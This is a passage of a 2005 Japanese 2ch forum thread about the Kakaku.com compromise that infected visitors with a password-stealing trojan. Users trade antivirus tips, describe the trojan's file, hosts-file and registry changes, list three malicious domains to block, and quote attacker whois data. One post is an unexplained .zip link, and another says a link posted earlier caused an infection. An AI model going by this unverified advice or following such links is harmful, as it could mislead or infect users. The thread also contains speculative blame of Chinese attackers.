428 :397:2005/05/16(月) 13:40:42 ID:8pdIx/xD
>>406
更新をしてもファイルが見つからないって出るけど、もう更新終わってるんですかね?


429 :名無しさん@5周年:2005/05/16(月) 13:41:01 ID:xvQwQ4hd
>>424
だからバスターといっしょにインスコしちゃだめって説明書に書いてあるんじゃね?

430 :名無しさん@5周年:2005/05/16(月) 13:41:02 ID:aeDfppoq
BitDefender Free Edition 7.2ダウンロードしたのはいいけど、zipファイルが一杯あって
どれをすればいいかわからん


431 :名無しさん@5周年:2005/05/16(月) 13:41:08 ID:STqs7Wit
>10
これあったんだけど、HPビルダー内にあったから大丈夫だよね?

432 :名無しさん@5周年:2005/05/16(月) 13:41:16 ID:OhO9iZ1O
NOD32って、ノートンをアンインストールしないとだめ?

433 :名無しさん@5周年:2005/05/16(月) 13:41:54 ID:ah4mpDvA
>>421
Trojan.PSW.Ajim_bbs (別名:Trojan.PSW.Delf)

Trojan.PSW.Ajim_bbsが実行されると、次のことを行います。
自分自身の新しいコピーを%windir%Winupdate.exeおよび%windir%System32Internets.exeとして作成します。
トロイの木馬は既存の%windir%Winver.exeファイルを自分自身で上書きします。
また、オリジナルの%windir%Hostsファイルを独自の特別なHostsファイルで上書きします。
トロイの木馬は自分自身が最初に実行されたフォルダと同じフォルダにSet.iniファイルを作成します。
また、Set.iniファイルを%windir%Desktopフォルダにコピーすることで、そのファイルを Windowsのデスクトップに表示します。

トロイの木馬は次のレジストリキーを、.exeファイルが実行されるか、
または.txtファイルが開かれるときに自分自身が実行されるように改変します。


434 :名無しさん@5周年:2005/05/16(月) 13:41:55 ID:PVVo30Qo
ノートンって削除用のツールがHPにでてるけどあれつかってもゴミ残るの?



435 :410:2005/05/16(月) 13:41:59 ID:u+rCatVi
>>423
BitDefender>NOD32>>>>>>>>>>>バスターかな?
とりあえずは、バスターの常駐切って、BitDefender使うのがいいのか。

436 :名無しさん@5周年:2005/05/16(月) 13:42:43 ID:STkYrvQ2
*.cssで検索したらウィルス入りじゃないcssファイルも全部検索しちゃうっつの

437 :名無しさん@5周年:2005/05/16(月) 13:42:44 ID:1SzWFQCU
インターネット・2ch専用PCでの感染はなかったけど、ゲーム専用マシンを立ち上げて、IEの履歴を確認したら価格comがばっちりあったので、
ウイルスチェックしてるんだが、IEのフォルダからtrojan.psyme.Vというのが出てきた。これってヤバイ?

438 :名無しさん@5周年:2005/05/16(月) 13:42:49 ID:8R36m3W8
バスター使ってるけどNOD32起動しても問題なかったよ
>>10 で引っかからなかったものの検索したら別のウィルスが7個も見つかって
ガクガクブルブル

439 :名無しさん@5周年:2005/05/16(月) 13:42:50 ID:jMwXRzFG
>>428
起動したら定義ファイルが最新じゃありません!って
注意書きが出てこなかったら大丈夫なんじゃない?

440 :名無しさん@5周年:2005/05/16(月) 13:42:52 ID:+rSHBy0g
>>407
>>422

汚名は返上するもんだ
舞-HiMEネタか?w


441 :名無しさん@5周年:2005/05/16(月) 13:43:11 ID:zH7f8VDg
>>10
ファイルサイズの条件も追加したほうがよくね?
41KBのCSSなんてよっぽどのサイトでない限りないぞ...

442 :名無しさん@5周年:2005/05/16(月) 13:43:43 ID:R/5yZY00
bitdefenderが現在1時間30分を超えて、未だ検出中です
慎重な仕事ぶりですね(^^;)

443 :名無しさん@5周年:2005/05/16(月) 13:44:05 ID:pNarrsFj
トロジャン!

444 :名無しさん@5周年:2005/05/16(月) 13:44:16 ID:eDYUgkJ2
>>428
左下にバージョンと日付が出てるから確認しな
たぶん1.1097が最新

445 :名無しさん@5周年:2005/05/16(月) 13:44:45 ID:D+Ycy6Wd
Firefox
avast!
Zonealarm
2chはギコナビ
ルーターはADSLモデム-SV III
女にモテたい31歳童貞パラサイトニートの俺は
どこから手をつければいいのか、アドバイス汁。


446 :名無しさん@5周年:2005/05/16(月) 13:44:50 ID:F2LnTQfV
>>433
だから具体的に何をするんだよ。
そんな呪文みたいな説明じゃわかんねーよヽ(`Д´)ノウワーン

447 :名無しさん@5周年:2005/05/16(月) 13:44:52 ID:4dCduuxK
>>440
ジェリド!ジェリド!!

448 :名無しさん@5周年:2005/05/16(月) 13:45:13 ID:8R36m3W8
あーバスターと同時に起動してる時
NOD32の方の常時保護は無効になってる
バスター優先みたい

449 :名無しさん@5周年:2005/05/16(月) 13:45:35 ID:PVVo30Qo
>>445
まずは彼女をつくろう(・∀・)

450 :名無しさん@5周年:2005/05/16(月) 13:45:37 ID:JY6oO9Hq
今頃告知すんな
最低でも閉鎖した時点で告知しとけ 糞会社

しかも感染してやがるし

451 :名無しさん@5周年:2005/05/16(月) 13:45:40 ID:VBVi6jmn
オペラ使いだったんだが、大丈夫だろうか。
ちなみにオペラのキャッシュ内に>>10のはあった。

つーかなんであのアンチウイルスソフトじゃないといかんのだ?
アヴァストじゃダメなのか?

452 :397:2005/05/16(月) 13:45:42 ID:8pdIx/xD
>>439
最新じゃないって言われるんだけど、更新するとファイルが無いって出る・・・・・・もうワケワカメですよ(´・ω・`)

453 :名無しさん@5周年:2005/05/16(月) 13:45:46 ID:TXsp55eU
取り合えず 二週間前のバックアップイメージを復元 バックアップしてて良かった(^_^)v

454 :名無しさん@5周年:2005/05/16(月) 13:46:02 ID:pLbDlmYm
>>445
ゴムのつけ方から

455 :名無しさん@5周年:2005/05/16(月) 13:46:09 ID:sJDox2sV
>445
仕事探せ

456 :名無しさん@5周年:2005/05/16(月) 13:46:19 ID:UnrBrUfK
>>440
「問題な日本語」に、汚名挽回も間違いじゃないって書いてあったぞ。

457 :名無しさん@5周年:2005/05/16(月) 13:46:29 ID:Uu1Jdl9o
ノートン入れっぱなしで常駐のまんまで
英語版NOD32インストして再起動したけど
別に問題なかったけど
スキャンしても問題なかった(これからBDインストしてスキャン汁
インスト時に常駐するかしないかとかの
チェックを入れなかったからかな?
つーか、どんなセットアップウィーザードだったか覚えてないや

458 :名無しさん@5周年:2005/05/16(月) 13:46:39 ID:p8zEWfOp
IEベースの2chブラウザとかもやめたがいい?
これから先のことも考えて。

459 :名無しさん@5周年:2005/05/16(月) 13:46:44 ID:R/5yZY00
バックアップじゃファイル駆除はできないんじゃなかったっけ

460 :名無しさん@5周年:2005/05/16(月) 13:48:05 ID:wYhBRkaj
ウイルスの説明見たけど良くわからん。
パスワード等の個人情報を抜いて、どっかに送信すんのか?

461 :439:2005/05/16(月) 13:48:34 ID:jMwXRzFG
>>452
それアップデート終わってないよ多分。
メールコピペ

◇ユーザ名とパスワードは、以下の手順で入力します。

【 これからNOD32アンチウイルスをインストールされるお客様 】

 インストール時に入力画面が出ますので、手順に従いユーザ名・パスワードを
 入力してください。

【 すでにNOD32アンチウイルスをインストールされたお客様 】

 1. NOD32コントロールセンターを開きます。
 2. [ 更新 ] をクリックしてください。  
 3. 右側に更新画面が出ますので、[ 設定 ] をクリックしてください。
 4. [ 更新の設定 ] 画面で、ユーザ名とパスワードを入力してください。

検査ログでバージョン1.1097(20050515)
なら大丈夫だと思うんだが・・・
更新は今混んでるのかもしんない・・・

462 :名無しさん@5周年:2005/05/16(月) 13:49:12 ID:ah4mpDvA
>>445
まずC ドライブを.cssで5月11以降でファイル検索
見つかったら感染の可能性

みつからなからったら
j4sb.com以外に shtm1.com と 0x61.com を
avast!のWebシールド、詳細設定、URLブロックに加える。前後にアスタリスク*を加えて

463 :名無しさん@5周年:2005/05/16(月) 13:49:33 ID:DjKPaLyL
>>430
http://www.altech-ads.com/product/10000839.htm
ここのダウンロードのリンクはなんか変だね

本家から落としたほうがいい
http://www.bitdefender.com/bd/site/products.php?p_id=24#

464 :名無しさん@5周年:2005/05/16(月) 13:50:18 ID:elAEorLZ
価格.comでどこのホルダーになんて名前のEXEファイルがコピーされるか
ぐらい説明しろよ。

EXEがダウンロードされて常駐するウィルスだろ。

465 :名無しさん@5周年:2005/05/16(月) 13:50:40 ID:FxXRoT0/
>>414
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20020312163618958?Open&src=&docid=20020301161610958&nsf=support%5CINTER%5Cnavjapanesekb.nsf&view=jp_docid&dtype=&prod=&ver=&osv=&osv_lvl=
このあたりを見たら?

466 :名無しさん@5周年:2005/05/16(月) 13:50:44 ID:/+Bu2lss
>>459
>453 はハードディスクのイメージ取ってて、それをまるごと書き戻したって言いたいんじゃなかろうか?

467 :名無しさん@5周年:2005/05/16(月) 13:50:46 ID:F2LnTQfV
AVGでは大丈夫なのかな?
価格.comはちゃんとAVGまでチェックするんだろうな?
大手2社しか確認しないなんてことはないだろうな?

468 :名無しさん@5周年:2005/05/16(月) 13:51:23 ID:RnfRUklc
そこでファイアフォックスですよ

469 :名無しさん@5周年:2005/05/16(月) 13:51:25 ID:VBVi6jmn
そもそも、マジでそのBitDefenderやらNODやらしか、対応してないウイルスなのか?

マジで怪しすぎ。

470 :397:2005/05/16(月) 13:52:03 ID:8pdIx/xD
>>444
バージョンは1.876(20040924)でどうも最新ぽっくない・・・
・・・・何で更新見つからないのorz


>>461
ありがと、もうちょっと待ってみます

471 :名無しさん@5周年:2005/05/16(月) 13:52:06 ID:XTJs91Sq
価格コムでウィルスソフトの最安店だけは検索できるようにしる!

472 :名無しさん@5周年:2005/05/16(月) 13:52:14 ID:+9xtlEBM
ふつーに感染してたみたい。。
あ゛ーーーオワタ ('A`)

473 :名無しさん@5周年:2005/05/16(月) 13:52:15 ID:fnYGh4Vn
>>445
おまえがウイルス

474 :名無しさん@5周年:2005/05/16(月) 13:52:41 ID:vjBWUSTU
いろいろ情報が錯乱して混乱してるのしれんが
価格.comの説明は不親切過ぎるな

475 :名無しさん@5周年:2005/05/16(月) 13:53:09 ID:pNarrsFj
当然新装開店お詫びセールやってくれるんだろうな

476 :名無しさん@5周年:2005/05/16(月) 13:53:43 ID:mm+IKCOE
FireFox使ってて感染した人っているの?
ちなみに俺は無事だった

477 :名無しさん@5周年:2005/05/16(月) 13:53:49 ID:/eFLavco
カカクコムがこの先生きのこるのか?

478 :名無しさん@5周年:2005/05/16(月) 13:54:03 ID:VBVi6jmn
NODとアヴァストは同時に動くん?

ほんと普通のアンチウイルスソフト入れてる人への配慮とかして欲しい。

479 :名無しさん@5周年:2005/05/16(月) 13:54:04 ID:1OIbpppz
>>469
http://pc8.2ch.net/test/read.cgi/sec/1116173150/118-119

480 :名無しさん@5周年:2005/05/16(月) 13:55:30 ID:gOBMrbDo
>475
もう使わないし、やらなくてもいいでしょ。
こんな対応悪い会社イラネ

481 :名無しさん@5周年:2005/05/16(月) 13:55:33 ID:VU1btMen
使ってて良かったFirefox

482 :名無しさん@5周年:2005/05/16(月) 13:55:34 ID:kN8Zj5+h
すげー!スレの勢いが5600越えてる。
が、舞-HiME最終回の60000越えにはまだ及ばないか…。

483 :435:2005/05/16(月) 13:55:41 ID:u+rCatVi
>>10で検索したらなかったんで、ちと安心。
バスターの対応待ちにするよ。

484 :名無しさん@5周年:2005/05/16(月) 13:55:42 ID:CnR5EC+H
履歴見たら最後にアクセスしたのが5月9日だった。。
あぶねーあぶねーw

485 :名無しさん@5周年:2005/05/16(月) 13:55:59 ID:VAuqT9NU
PSW.Delf.FZが見つかりました(´・ω・`)
でもtrojandownloader.small.AAOの方は引っかからないけど、これってセットで見つからなくても大丈夫なの?

486 :名無しさん@5周年:2005/05/16(月) 13:56:06 ID:KfV4KyUf
価格.com使ったこと無いけどオレにもお詫びセールやって欲しい

487 :439:2005/05/16(月) 13:56:09 ID:jMwXRzFG
>>470
あんまりPCに詳しくない人っぽいので
常駐タスクにNODない?ちっこいアイコン。
それを右クリックすればNOD32コントロールセンターってのが出てくるよ。
壁紙のほう(うまく言えないな〜)にあるアイコンのほうじゃなくてね?
そのコントロールセンターの所に更新って所あるからそれクリック。
単なる起動画面の方には更新タブ無いよ。

使い勝手悪いソフトだよね、これ・・・

488 :名無しさん@5周年:2005/05/16(月) 13:56:13 ID:ztYM5wkf
>>482
舞-HiMEの最終回って鬱エンドだったの?

489 :名無しさん@5周年:2005/05/16(月) 13:56:27 ID:5apvs5ZS
∩( ´Α`)< 先生
頭悪い俺にも分かるようにそろそろまとめて!

490 :名無しさん@5周年:2005/05/16(月) 13:56:28 ID:K1D6s46W
>avastでもWeb シールドの詳細設定、URLブロックで*www.j4sb.com*にアクセスしない
>ようにできる。
これいいな。AVGから乗り換えたくなった。

491 :名無しさん@5周年:2005/05/16(月) 13:56:43 ID:ah4mpDvA
まずC ドライブを.cssで5月11以降でファイル検索
     ↓
見つかったら感染の可能性
     ↓
NOD32などで駆除
     ↓
見つからなかった人も見つかった人も
     ↓
その後の感染防止に
j4sb.com shtm1.com 0x61.com
の三つのサイトへのアクセスをブロックする
ソフトはProxomitron、avast! などプロキシーとして動作して
特定のサイトへのアクセスを防止する機能を持ったものをつかう。

492 :名無しさん@5周年:2005/05/16(月) 13:57:13 ID:4c94BFhH
ところで、この価格コムという会社の今までの経営状態は悪かった
ということはなかったでしょうか?
粉飾決算は?
そういう背景の可能性も考えるべきではないでしょうか?


493 :名無しさん@5周年:2005/05/16(月) 13:58:02 ID:kN8Zj5+h
>>488
完全なる復活Happyエンドだった。禿しくスレ違いでスマソ。
しかし、今回のカカクコムは鬱エンドになってしまうのだろうか…。

494 :名無しさん@5周年:2005/05/16(月) 13:58:07 ID:8R36m3W8
地方に住んでる俺に価格.comなぞ参考にもならん

495 :名無しさん@5周年:2005/05/16(月) 13:58:22 ID:VBVi6jmn
>>479
サンクス

496 :名無しさん@5周年:2005/05/16(月) 13:58:30 ID:FJYtD19Z
>>445
ギコナビってIEコンポなんじゃ・・・

497 :名無しさん@5周年:2005/05/16(月) 13:58:41 ID:HGG1JTxv
http://age3.tubo.80.kg/age02/img001/2851.zip

498 :名無しさん@5周年:2005/05/16(月) 13:58:46 ID:Dh+TG1IF

590 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2005/05/16(月) 13:27:18 ID:???0 BE:176674-##
kabu.comもwindowsじゃなかったっけ?

593 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2005/05/16(月) 13:30:16 ID:???0 BE:126454-##
http://toolbar.netcraft.com/site_report?url=http://www.kabu.com
やっぱりwindowsだ。

598 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2005/05/16(月) 13:34:35 ID:0N8BIkxV0
2chもIISにしよう。うん。

603 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2005/05/16(月) 13:47:08 ID:???0 BE:226894-##
IIS化のほうがもっとがんばるかも、、、

605 名前:マァヴ ◆jxAYUMI09s [sage] 投稿日:2005/05/16(月) 13:49:16 ID:pL7oudzg0 BE:6735555-#
>603
クラックされるより恐ろしい事態に・・・・(^_^;)



499 :名無しさん@5周年:2005/05/16(月) 13:58:55 ID:mm+IKCOE
>>492
今はそっちの心配をしてあげても仕方ないですね

500 :名無しさん@5周年:2005/05/16(月) 13:58:56 ID:Um2jqE3Y
>>217
a02.cssなら圧縮ファイルにチェックをつけておけば検出できる
詳細検索でなくてもおk



501 :名無しさん@5周年:2005/05/16(月) 13:59:11 ID:RHp8nMFp
気になるのは、11日に発覚したというだけで、
それより以前にどうだったかは書いてないということ。
11日以前に見た人もやばい可能性もあるかもしれん。

502 :名無しさん@5周年:2005/05/16(月) 13:59:18 ID:+rSHBy0g
>>472

(-∧-;) ナムナム


503 :名無しさん@5周年:2005/05/16(月) 13:59:22 ID:du/EnRn8
最近ADSLの最安値ページ見まくってたけど
感染してなかった

504 :名無しさん@5周年:2005/05/16(月) 13:59:27 ID:vjBWUSTU
>>489
親切なまとめサイトあるよ
価格.comがクラッキングされた件(´・ω・)暫定まとめサイト
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm


505 :名無しさん@5周年:2005/05/16(月) 13:59:30 ID:oH6gCxgr
nod動かしてるけど、なんかやたらエラー多くね?
ファイルがロックされてるとか開けませんでしたとか

506 :439:2005/05/16(月) 14:00:45 ID:jMwXRzFG
>>505
使ってるファイルは入れない仕様みたいだよ。

507 :名無しさん@5周年:2005/05/16(月) 14:01:35 ID:5apvs5ZS
>>504
ありがとん(´・ω・`)/~~

508 :名無しさん@5周年:2005/05/16(月) 14:01:48 ID:nBTqEYvy
>>475
カカクは店じゃないだろ

509 :名無しさん@5周年:2005/05/16(月) 14:02:03 ID:ar39pHbn
>>506
それ意味なくね?

510 :397:2005/05/16(月) 14:02:36 ID:8pdIx/xD
>>487
そこまでは行けたんだけど更新できる画面の
「自動更新」「更新」「設定」の更新をクリックしてもファイルが見つかりませんって出るんよ

511 :名無しさん@5周年:2005/05/16(月) 14:03:08 ID:VBVi6jmn
もう価格使わないから誰かこういうサイトでいいとこ教えて。

つーか中国人の仕業ってことは価格が落ちぶれることが狙いなんかね。
とりあえず適当にでかいサイト狙っただけか?

512 :439:2005/05/16(月) 14:04:39 ID:jMwXRzFG
>>510
じゃあ今混んでるのかも・・・ちょっと様子みたほうがいいかもしんないね。

513 :マウアー:2005/05/16(月) 14:04:40 ID:C2mfxJGA
>>447
ジェリドは悪くない!
悪いのは、チャンスを与えてくれたジャマイカン・ダニンガンじゃまいかん?

514 :名無しさん@5周年:2005/05/16(月) 14:05:11 ID:ZOjPWrCo
最近PC蛾物故割れて、価格コムよく覗いてたんだけど
感染してなかったな。
アンチウィルスソフトもスパイウェア関連も入れてない
言わば全裸で特攻したようなもんだったけど。
検出された人はほんとに価格コム経由で感染したのかな。

515 :名無しさん@5周年:2005/05/16(月) 14:05:50 ID:nreiNFk4
>>514
OSとジャバとアクティブなんだったの?

516 :397:2005/05/16(月) 14:05:55 ID:8pdIx/xD
>>512
うん、もうちょっと待ってみる
親身になってくれてアリガトン

517 :名無しさん@5周年:2005/05/16(月) 14:06:05 ID:Gpf+ZSgC
>>511
coneco.net 価格比較サイト(コネコネット)
http://www.coneco.net/

ベストゲート (BestGate) 〜パソコン・家電の価格比較サイト〜
http://www.bestgate.net/

518 :名無しさん@5周年:2005/05/16(月) 14:06:11 ID:TG8ZgCVw
>>511
PC関係ならBestgate

519 :名無しさん@5周年:2005/05/16(月) 14:08:01 ID:VBVi6jmn
>>517-518
サンクス

ビットディフェンダーとやらとりあえずインストールするか
アヴァスト早く対応しやがれー

520 :名無しさん@5周年:2005/05/16(月) 14:08:30 ID:D+Ycy6Wd
悪いのは価格comじゃ無くて、セキュリティホールを残したままの
欠陥OSを販売しているマイクロソフトだろ。
MSの瑕疵をサードパティーが必死でフォロー。

当のMSは消費者が一方的に不利な契約を押しつけ知らんぷり。
なんで誰もMSを責めないのだ?マスコミも。

521 :名無しさん@5周年:2005/05/16(月) 14:08:43 ID:8+e5K1Hn
アダルトサイト巡ってウイルスかかるんならともかく
一般のサイトでそうなるのはまいる。

レンダリングをIEのライブラリ使ったブラウザで、一般サイト→スクリプトオン、アダルトサイト→スクリプトオフてしてる人もいるだろし。


522 :名無しさん@5周年:2005/05/16(月) 14:08:48 ID:ys1mbETH
しかし今回何で価格.comがターゲットになったのかな?
この調子だと今後もこの種のハッキングが起こりそうだな。

523 :名無しさん@5周年:2005/05/16(月) 14:08:52 ID:+VguF0Vj
>>511
価格comが標的というより、日本全体を混乱させることが目的なんだろ。
つまり、「中国人によるテロ攻撃」ってことでいいかと。


524 :名無しさん@5周年:2005/05/16(月) 14:09:26 ID:Mzz7vhXW
メインとサブ、2台あって1台は自宅で、もう1台は店で使っているんだけど
同じようにサイト閲覧してても感染はサブのみでメインの方は問題なかった。

メインの方は9日にRAIDシステムに組み替えた関係でOSを一旦削除し
てクリーンインストールしているのだが、それが功を奏したのかな。
ちなみにサブの方は、1ヶ月前に購入したばかりでそのまま使用。

525 :名無しさん@5周年:2005/05/16(月) 14:09:45 ID:G7MVMwoS
>>520
嫌なら使うな

世の慣わし

526 :名無しさん@5周年:2005/05/16(月) 14:09:46 ID:xtOERrS9
910 名前:名無しさん@5周年[sage] 投稿日:2005/05/16(月) 11:35:19 ID:xtOERrS9
俺ほとんど毎日価格.comチェックしてんだけど、
5日にノートンでチェックして感染してないのを確認してからPC落として、
次に起動したら何故かOS壊れてて再インスコした。win2k。

この頃からなんてことはないよな?

527 :名無しさん@5周年:2005/05/16(月) 14:10:53 ID:bwxwt6yt
>>520
まずキミが先頭に立って呉れたまへ

528 :名無しさん@5周年:2005/05/16(月) 14:11:05 ID:Dh+TG1IF
>511
次はkabu.comという噂も・・・

529 :名無しさん@5周年:2005/05/16(月) 14:11:32 ID:9o0MyMug
>>509
意味無くは無いよ。
ファイルをロックできるのは実行されてるプログラムのみだから。
ウィルスが自分のファイルをロックして隠そうとすれば
ウイルスが実行されてるってコトになるよね?
そーすっと、メモリスキャンでウィルスが発見できるわけよ。

530 :名無しさん@5周年:2005/05/16(月) 14:11:58 ID:JSo2gKgF
>>433
サンクス。
とりあえずわかるところだけ見たけど
hostsもset.iniも問題なさそうだった。
exeの改竄はようわからん。
実は13日からバスターに乗り換えてるので
そちらの対応待ちだな。



531 :名無しさん@5周年:2005/05/16(月) 14:12:00 ID:9j6qLyNn
>>436
あほ。5月11日以降だっての。
cssなんてめったに降りて来ないがな。

532 :名無しさん@5周年:2005/05/16(月) 14:12:29 ID:VBVi6jmn
>>520
マスコミなんて金でどうにでもできる

>>523
正直今回ばかりはなあ ちょっと切れかけたぞ
証拠つきつけて対応求めた方がいいだろ
価格は一般人もよく見ると思うんだが、中国の反日団体がやったって聞いたらどう思うかね
中共の工作員がやったのかマジで反日団体がやったのかはわからんが

533 :名無しさん@5周年:2005/05/16(月) 14:12:56 ID:uGi6gVMV
やっぱりwin鯖が問題だったの?

534 :名無しさん@5周年:2005/05/16(月) 14:12:58 ID:s53gXUDR
>>531
Firefox1.04をインスコしてると、わんさか出てくる罠

535 :名無しさん@5周年:2005/05/16(月) 14:13:42 ID:zZhz/MhN
中国人め、なかなかやるようになったな!

536 :名無しさん@5周年:2005/05/16(月) 14:14:13 ID:u/81JbuV
>>521
スクリプトオフにしようがしまいが関係ない
IEそのものの欠陥でありOS自体の欠陥でもあるんだけど・・・

537 :名無しさん@5周年:2005/05/16(月) 14:14:14 ID:9j6qLyNn
>>534
Firefoxなんて致命的なセキュリティホールあるブラウザなんて
使ってるやつおらんて。

538 :名無しさん@5周年:2005/05/16(月) 14:14:32 ID:htiPbfd9
ウイルスバスター(トレンドマイクロ)、14:13分現在未対応。

くどいようだが、オンラインスキャンしたって無 馬太..._〆(゚▽゚*)

539 :名無しさん@5周年:2005/05/16(月) 14:14:36 ID:kN8Zj5+h
>>521
以前のNimdaを思い出したよ。アレにもまいった。

540 :名無しさん@5周年:2005/05/16(月) 14:15:10 ID:M539VtYo
早朝前スレに貼ってあったURLでこのウィルスにかかったおれが来ましたよ。

541 :名無しさん@5周年:2005/05/16(月) 14:15:44 ID:q75C2lEK
>>523
スパム標的用個人情報収集って線もありそうですな

542 :名無しさん@5周年:2005/05/16(月) 14:15:45 ID:G7MVMwoS
>>529
漏れPCのこと知らんのだけど
どの程度まで隠れられるの?
たとえばローカルを検索するとメモリに退避しちゃう
様なのってあるのかな?

543 :名無しさん@5周年:2005/05/16(月) 14:15:58 ID:croT0bAw
NOD32で検査したところ、
案の定Win32/PSW.Delf.FZ トロイが検出されたんだけど
「このファイルの感染は駆除できません」
と出るんだけど何で?
他の人は駆除できました?

544 :名無しさん@5周年:2005/05/16(月) 14:17:19 ID:jMwXRzFG
>>543
駆除出来なかったから削除したよ。

545 :名無しが多い:2005/05/16(月) 14:17:24 ID:yu1WDOO2
ウイルス感染騒ぎの時に、感染状況報告専用のスレッドって建てないんですかね。
どんな環境で感染した/しない、等々。

2chなら見てる人も多いし書き込みも自由だから、状況を把握しやすいと思うんですけど。

546 :名無しさん@5周年:2005/05/16(月) 14:17:52 ID:TG8ZgCVw
>>537
この間の脆弱性塞いだ1.0.4出てた希ガス

547 :名無しさん@5周年:2005/05/16(月) 14:18:24 ID:5bNDvtq0
常にwebトラフィック上位50に入るようなサイトだからな。
そんなサイトがセキュリティホール抱えてれば、狙われて当然。

548 :名無しさん@5周年:2005/05/16(月) 14:18:41 ID:VBVi6jmn
まあ使いにくいから火狐なんて使わないが、俺はオペラ使いだがオペラはどうなんだろ。

549 :名無しさん@5周年:2005/05/16(月) 14:19:45 ID:+rSHBy0g
>>540

自爆乙。

おまいら踏むなよ(;´Д`)


550 :名無しさん@5周年:2005/05/16(月) 14:20:38 ID:LI11eXP0
NOD32やばすぎ、メインPCに入れる前にサブPCで試したらアプリケーションの立ち上げ終了激遅。
スキャン終わらしてアンインスコしてwin終了させるときにFDDが「ガッががgっががああががががg」って
ものすごい勢いで一分ぐらいたたかれました。
まぁpen866のサブPCだけど。

551 :名無しさん@5周年:2005/05/16(月) 14:20:59 ID:h0NR7OZ7
ライブアップデート未だ対応されず。
ナメてんのか、ノー豚!

552 :名無しさん@5周年:2005/05/16(月) 14:21:37 ID:3bxbiVb3
俺オペラだけど今検索始めたばかりだからよくわからんな

553 :名無しさん@5周年:2005/05/16(月) 14:21:51 ID:aQjStjJS
>>255 「トロイの木馬」が、価格コム閲覧者のパソコンに、こっそり潜り込んだあと、
盗んだデータを送る先のサーバーは、北京(Beijing)にあるというわけか。

これだけでは、すぐに中国人が犯人とは言えないな。
まあ、バレタ場合に巨額の損害賠償を請求されるのは、わかりきってるから、
日本国内に居る奴、日本国籍のある奴は、こんなことしないだろうが。。。

>スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、

>ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22

>j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。
>whoisでこれらのサイト情報を検索すると

>ttp://whois.ansi.co.jp/?key=shtm1.com
>ttp://whois.ansi.co.jp/?key=0x61.com

>Admin Name........... pi ger
>Admin Address........ hidden
>Admin Address........
>Admin Address........ Beijing
>Admin Address........ 123456
>Admin Address........ BJ
>Admin Address........ CN
>Admin Email.......... fuckjpmm@china.com
>Admin Phone.......... +86.1012345678
>Admin Fax............ +86.1012345678

554 :名無しさん@5周年:2005/05/16(月) 14:22:16 ID:JSo2gKgF
>>551
バスターの大チョンボを見て、テストに慎重なのかもな。

555 :名無しさん@5周年:2005/05/16(月) 14:22:42 ID:F2LnTQfV
感染したら具体的にどうなるんだ?。
もうちょっと初心者にも分かるように解説よろ。

556 :名無しさん@5周年:2005/05/16(月) 14:23:13 ID:U9Pv+I87
PSW.Delf.FZがIEキャッシュから見つかったのだが、これって動き出すと常駐するの?
今のところキャッシュのみでメモリ上とか他のフォルダからは出てない。
これはDLされたけど動かなかったって事なの?
それとも単発で何かヤバイ事をするの?

誰か詳しい人キボン

557 :名無しさん@5周年:2005/05/16(月) 14:23:20 ID:GKV4McyJ
>>551
それは毎週木曜更新


558 :名無しさん@5周年:2005/05/16(月) 14:23:37 ID:8HUqzQGo
2ちゃんブラウザで価格comをみているので何の被害もなし。

559 :名無しさん@5周年:2005/05/16(月) 14:24:00 ID:/+Bu2lss
>>555
大変なことになる。

560 :名無しさん@5周年:2005/05/16(月) 14:24:21 ID:VBVi6jmn
>>558
どうやって見るのか詳細

561 :名無しさん@5周年:2005/05/16(月) 14:25:37 ID:FAUHNyQa
>551
プ

562 :名無しさん@5周年:2005/05/16(月) 14:25:41 ID:kN8Zj5+h
結局ノートン先生は対応したのかな?
もう、おねがい☆ティーチャー…。

563 :名無しさん@5周年:2005/05/16(月) 14:26:00 ID:WS9UeFKB
NOD32で詳細な検査してるんだけど、

アーカイブは破損しています - ファイルは抽出できませんでした

ってのが出まくってるよ・・・

564 :名無しさん@5周年:2005/05/16(月) 14:26:22 ID:3RhotJB8
>>555
キーボードから傷口に感染。
ウイルスが血管を伝わって脳に至る。

565 :名無しさん@5周年:2005/05/16(月) 14:26:25 ID:7G2uHeJD
意外と初心者多いんだな2chって。

566 :名無しさん@5周年:2005/05/16(月) 14:26:40 ID:Z4l3yLjt
.cssで検索しても何も検出されなかったし、
BitDefenderとかいうのでスキャンしても何も検出されなかったからとりあえず大丈夫かな

567 :名無しさん@5周年:2005/05/16(月) 14:26:45 ID:MyovBSXz
>>560
ビューアじゃね?

568 :名無しさん@5周年:2005/05/16(月) 14:26:56 ID:OZHqBxDU
OS再インスコから復帰しました・・・

569 :名無しさん@5周年:2005/05/16(月) 14:27:08 ID:VBVi6jmn
>>567
なるほど

570 :名無しさん@5周年:2005/05/16(月) 14:27:13 ID:ICQ0G/Zq
>>553
証拠残しまくりだし、これで捕まらなかったら詐欺だな。

571 :名無しさん@5周年:2005/05/16(月) 14:28:48 ID:9o0MyMug
>>542
まあ、隠れるというかウイルスが実行した時点で他のソフトの動作を阻害することは可能だから
例えばネットの設定を変えて、アンチウイルスソフトをアップデートできないようにしたりとか、
常に2つ実行して、片方停止させてもすぐに増殖して自分が消されないようにするとか、そういうのは実際ある。

572 :名無しさん@5周年:2005/05/16(月) 14:29:12 ID:croT0bAw
>>563
「詳細な」検査ってどうやるの?

573 :名無しさん@5周年:2005/05/16(月) 14:29:28 ID:LisxHFxq
先生の対応マダー?
タノムヨ先生。。。。

574 :名無しさん@5周年:2005/05/16(月) 14:29:29 ID:gyhoJ9jr
あとは葬儀屋がやりますから

575 :名無しさん@5周年:2005/05/16(月) 14:30:12 ID:Dh+TG1IF
2chのTOPページを開いただけで、ウイルス感染なんてことになったらすごいだろうねー

576 :名無しさん@5周年:2005/05/16(月) 14:30:27 ID:SLAaKy7Y
バスターまだですかね・・・
前回の件を考えて慎重になってるのかすらぁ(;´Д`)

577 :名無しさん@5周年:2005/05/16(月) 14:31:00 ID:4Cl9fLJ6
実はNOD32の宣伝

578 :名無しさん@5周年:2005/05/16(月) 14:31:22 ID:s53gXUDR
>>575
そういや、最近topページなんて全く見てないな

579 :名無しさん@5周年:2005/05/16(月) 14:31:26 ID:Dnp+ylCF
>>553
Admin Emailがいかにもすぎる。
